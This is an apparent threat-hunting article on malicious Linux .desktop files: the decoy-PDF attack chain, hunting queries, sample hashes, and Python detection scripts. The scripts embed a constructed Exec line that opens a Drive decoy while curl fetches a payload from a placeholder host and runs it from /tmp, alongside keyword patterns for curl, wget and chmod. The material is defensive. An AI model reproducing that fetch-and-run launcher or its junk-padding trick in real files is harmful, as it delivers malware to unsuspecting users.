Google Threat Intelligence has started a blog series on advanced threat hunting methods for security professionals. The first post covers identifying malicious .desktop files on Linux systems.
What Are .Desktop Files?
.desktop files are plain-text configuration files used by Linux desktop environments. They describe how an application is displayed in menus and how it is launched, following the freedesktop.org Desktop Entry Specification: comment lines start with #, a group header such as [Desktop Entry] opens a group, and each line inside it is a key=value pair.
A typical .desktop file contains a single [Desktop Entry] group with keys like these:
```ini
[Desktop Entry]
Name=Application Name
Comment=Short description
Exec=/path/to/executable %U
Icon=icon-name
Terminal=false
Type=Application
Categories=Utility;Application;
```
New Threats: Malicious .Desktop Files
Google Threat Intelligence has found a new wave of malicious .desktop files. These files do not look like the standard structure at first glance: they often contain thousands of lines of junk, mostly comment lines starting with #, which the launcher ignores and which bury the small working entry.
Hidden inside the padding is a valid [Desktop Entry] group. Its Exec key runs the attacker's commands when the user double-clicks the file. One common trick is to open a decoy PDF hosted on Google Drive while downloading and running malware in the background.
How the Attack Works
When the file is opened, the Exec command calls xdg-open with a Google Drive link to a PDF. xdg-open hands the URL to the desktop environment's default browser, so the decoy opens in, for example, Firefox. The process chain below is what the post observed on XFCE.
The attack process includes:
- xdg-open: Detects the running desktop environment (on XFCE, by looking for an xfce_desktop_window) and dispatches the URL.
- exo-open: The XFCE helper that xdg-open delegates to.
- exo-helper-2: Launches the configured web browser with the Google Drive link (the "--launch WebBrowser" argument).
Each hop gives security teams a chance to detect the attack. For example, exo-helper-2 being launched with a Google Drive URL is a strong signal in sandbox telemetry, where no user is clicking links.
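As an added example (not code from the Google Threat Intelligence post), the following Python turns the process chain described above into detection logic over constructed process telemetry. The events, PIDs, file-manager parent and placeholder URLs are all assumed; the broad rule mirrors the post's first query (a URL opener handed a Google Drive link), and the refined rule additionally requires a `sh -c`/`bash -c` wrapper in the ancestry, which is how an Exec= line runs and which a user clicking a Drive link in a mail client does not produce.

```python
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid comm cmdline")

# Constructed process telemetry (not from the post). Chain 1000-1007 is a
# double-clicked .desktop file on XFCE; chain 2000-2003 is a user clicking a
# Drive link in a mail client. Hosts and file IDs are placeholders.
DRIVE = "https://drive.google.com/file/d/PLACEHOLDER/view"
OTHER = "https://drive.google.com/file/d/OTHER/view"
EVENTS = [
    Proc(1000, 1, "thunar", "thunar"),
    Proc(1001, 1000, "bash",
         f'bash -c "xdg-open {DRIVE} & curl -s http://example.invalid/p -o /tmp/.p; /tmp/.p"'),
    Proc(1002, 1001, "xdg-open", f"xdg-open {DRIVE}"),
    Proc(1003, 1002, "grep", "/usr/bin/grep grep -i ^xfce_desktop_window"),
    Proc(1004, 1002, "exo-open", f"exo-open {DRIVE}"),
    Proc(1005, 1004, "exo-helper-2", f"exo-helper-2 --launch WebBrowser {DRIVE}"),
    Proc(1006, 1005, "firefox", f"firefox {DRIVE}"),
    Proc(1007, 1001, "curl", "curl -s http://example.invalid/p -o /tmp/.p"),
    Proc(2000, 1, "thunderbird", "thunderbird"),
    Proc(2001, 2000, "xdg-open", f"xdg-open {OTHER}"),
    Proc(2002, 2001, "exo-open", f"exo-open {OTHER}"),
    Proc(2003, 2002, "exo-helper-2", f"exo-helper-2 --launch WebBrowser {OTHER}"),
]

# URL openers named in the post's queries, covering XFCE, GNOME and KDE.
OPENERS = ("xdg-open", "exo-open", "exo-helper-2", "gio open", "kde-open")
# A shell invoked with -c, which is how Exec=bash -c "..." runs.
SHELL_WRAPPER = re.compile(r"^(?:/bin/|/usr/bin/)?(?:ba)?sh\s+-c\s")


def ancestors(pid, by_pid):
    """Yield the process and its ancestors, nearest first, until the root is lost."""
    while pid in by_pid:
        p = by_pid[pid]
        yield p
        pid = p.ppid


def hunt_drive_opens(events):
    """Return (broad, refined).

    broad:   PIDs of URL-opener processes whose command line carries a Google
             Drive URL (the post's first query, applied to host telemetry).
    refined: for those with a sh -c / bash -c ancestor: (opener pid, shell pid,
             root-to-leaf chain of process names, other children of that shell).
    """
    by_pid = {e.pid: e for e in events}
    broad, refined = [], []
    for e in events:
        if "https://drive.google.com/" not in e.cmdline:
            continue
        if not any(e.cmdline.startswith(o) or e.comm == o.split()[0] for o in OPENERS):
            continue
        broad.append(e.pid)
        chain = list(ancestors(e.pid, by_pid))
        shell = next((a for a in chain[1:] if SHELL_WRAPPER.match(a.cmdline)), None)
        if shell is None:
            continue
        # Siblings under the shell expose the background download the decoy hides.
        siblings = sorted(c.comm for c in events if c.ppid == shell.pid)
        refined.append((e.pid, shell.pid,
                        " -> ".join(a.comm for a in reversed(chain)), siblings))
    return broad, refined


if __name__ == "__main__":
    broad, refined = hunt_drive_opens(EVENTS)
    print("broad matches:", broad)
    for opener_pid, shell_pid, chain, siblings in refined:
        print(f"pid {opener_pid} via shell {shell_pid}: {chain}; shell children: {siblings}")
```

On a real host the broad rule fires for every Drive link a user opens, so the refined rule, or an equivalent join on the parent shell and its sibling processes (here the curl writing to /tmp), is what separates the .desktop launch from ordinary browsing.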
Threat Hunting Strategies
Google suggests query-based hunting in its threat intelligence platform. The strategies combine behavioral analysis (sandbox process activity), process tracking, and file content inspection.
| Hunting Strategy | Query | Purpose |
|---|---|---|
| exo-helper-2 Processes | `behavior_processes:"--launch WebBrowser" behavior_processes:"https://drive.google.com/"` | Detects samples in which XFCE's exo-helper-2 launches the browser with a Google Drive URL. |
| All URL-Opening Processes | `(behavior:"xdg-open" or behavior:"exo-open" or behavior:"exo-helper-2" or behavior:"gio open" or behavior:"kde-open") and behavior_processes:"https://drive.google.com/"` | Expands detection to the GNOME (gio open) and KDE (kde-open) URL handlers. |
| xdg-open Artifacts (1) | `behavior:"/usr/bin/grep grep -i ^xfce_desktop_window" filename:"*.desktop"` | Finds .desktop files whose execution shows xdg-open's check for an XFCE desktop window. |
| xdg-open Artifacts (2) | `behavior:"/usr/bin/grep grep -i ^xfce_desktop_window" behavior_processes:"https://drive.google.com/"` | Combines the XFCE detection artifact with Google Drive activity. |
| xdg-open Artifacts (3) | `behavior:"/usr/bin/grep grep -i ^xfce_desktop_window" (behavior_processes:"https://drive.google.com/" or (behavior_processes:"http" behavior_processes:".pdf"))` | Also catches decoy PDFs served from hosts other than Google Drive. |
| Content-Based Detection | `content:{45 78 65 63 3d 62 61 73 68 20 2d 63 20 22} content:{4e 61 6d 65 3d} content:{2e 70 64 66} content:{5b 44 65 73 6b 74 6f 70 20 45 6e 74 72 79 5d}` | Hex patterns for the strings `Exec=bash -c "`, `Name=`, `.pdf` and `[Desktop Entry]`, all required in the file body. |
| Generic .Desktop File Hunting | `content:{5b4465736b746f7020456e7472795d}@0 p:1+` | Files beginning with `[Desktop Entry]` at offset 0 that have at least one detection; a broad starting point for .desktop downloaders and loaders. |
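The content-based rows above, and the junk-padded structure described under "New Threats", can both be checked offline with a small parser. The following Python is an added example, not code from the post: it parses a .desktop file per the Desktop Entry Specification (comments skipped, keys read from the [Desktop Entry] group), then applies the plain-text form of the hex patterns plus a few structural heuristics. The two sample files, their Name values, the placeholder Drive URL and the download host are constructed for the example.

```python
import re

# Constructed sample in the style the post describes: a valid [Desktop Entry]
# buried in junk comment lines (real samples carry thousands; 40 per side here).
# The Drive file ID and download host are placeholders, not indicators.
JUNK = "\n".join("# " + "x" * 60 for _ in range(40))
MALICIOUS_DESKTOP = JUNK + """
[Desktop Entry]
Name=Award Medal Declaration Form.pdf
Terminal=false
Type=Application
Icon=application-pdf
Exec=bash -c "xdg-open https://drive.google.com/file/d/PLACEHOLDER/view & curl -s http://example.invalid/p -o /tmp/.p; chmod +x /tmp/.p; /tmp/.p"
""" + JUNK + "\n"

# Constructed benign launcher for comparison.
BENIGN_DESKTOP = """[Desktop Entry]
Name=Text Editor
Comment=Edit text files
Exec=/usr/bin/gedit %U
Icon=gedit
Terminal=false
Type=Application
Categories=Utility;TextEditor;
"""

# ASCII form of the four hex patterns in the content-based query.
CONTENT_PATTERNS = [b'Exec=bash -c "', b"Name=", b".pdf", b"[Desktop Entry]"]
URL_OPENERS = ("xdg-open", "exo-open", "exo-helper-2", "gio open", "kde-open")


def parse_desktop_entry(text):
    """Parse per the Desktop Entry Specification.

    Lines starting with '#' are comments, '[Group]' lines open a group and the
    rest are key=value pairs. Returns (keys of [Desktop Entry], comment count).
    """
    keys, comments, in_entry = {}, 0, False
    for line in text.splitlines():
        s = line.strip()
        if not s:
            continue
        if s.startswith("#"):
            comments += 1
            continue
        if s.startswith("[") and s.endswith("]"):
            in_entry = s == "[Desktop Entry]"
            continue
        if in_entry and "=" in s:
            k, v = s.split("=", 1)
            keys[k.strip()] = v.strip()
    return keys, comments


def hunt_desktop(text):
    """Return a list of findings for one .desktop file (empty list = nothing suspicious)."""
    raw = text.encode()
    keys, comments = parse_desktop_entry(text)
    exec_line = keys.get("Exec", "")
    findings = []
    if all(p in raw for p in CONTENT_PATTERNS):
        findings.append("content: all four hex-query patterns present")
    if b"[Desktop Entry]" in raw and not raw.startswith(b"[Desktop Entry]"):
        findings.append("content: [Desktop Entry] not at offset 0 (padding before the header)")
    if comments > 20 and keys:
        findings.append(f"structure: {comments} comment lines around a {len(keys)}-key entry")
    if re.match(r'^(?:ba)?sh\s+-c\s+"', exec_line):
        findings.append("exec: shell -c wrapper")
    if any(o in exec_line for o in URL_OPENERS) and (
        "drive.google.com" in exec_line or re.search(r"https?://\S+\.pdf", exec_line)
    ):
        findings.append("exec: URL opener pointed at Google Drive or a remote PDF")
    if exec_line and any(t in exec_line for t in ("curl ", "wget ", "chmod +x", "/tmp/")):
        findings.append("exec: download or stage-to-disk commands")
    return findings


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_DESKTOP), ("benign", BENIGN_DESKTOP)):
        print(label, hunt_desktop(sample))
```

Note the interaction between the two content queries in the table: the generic `@0` query only matches files whose first bytes are `[Desktop Entry]`, so a junk-padded sample like the one above is caught by the unanchored four-pattern query but not by the anchored one. The parser ignores the padding exactly as the launcher does, which is why reading the Exec key is more robust than scanning the raw bytes.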
Recent Malicious Samples
Google Threat Intelligence found several malicious .desktop files in 2025. These samples may be related to a campaign reported by Zscaler, though that link is not confirmed.
- Opportunity for Exercise, Re Exercise of Option for pay Fixation.desktop (SHA256: c2f0f011eabb4fae94e7a5973f1f05208e197db983a09e2f7096bcff69a794d1, April 30, 2025, India)
- Revised SOP for Webex Meeting – MOD.desktop (SHA1: 8d61ce3651eb070c8cdb76a334a16e53ad865572, April 15, 2025, India)
- Award Medal Declaration Form.desktop (SHA1: 1814730cb451b930573c6a52f047301bff0b84d1, April 8, 2025, Australia)
These files were mostly uploaded from India and Australia. The submitters may be using proxies, however, so the upload country is not a reliable indicator of where the files originated.
Conclusion
Google’s new blog series provides security teams with practical methods to hunt for malicious .desktop files. Using a mix of behavioral analysis, process monitoring, and content checks, defenders can find threats early.
The provided queries can be adjusted to fit different environments and telemetry sources. As attackers change their tactics, these strategies give defenders a starting point that is easy to refine.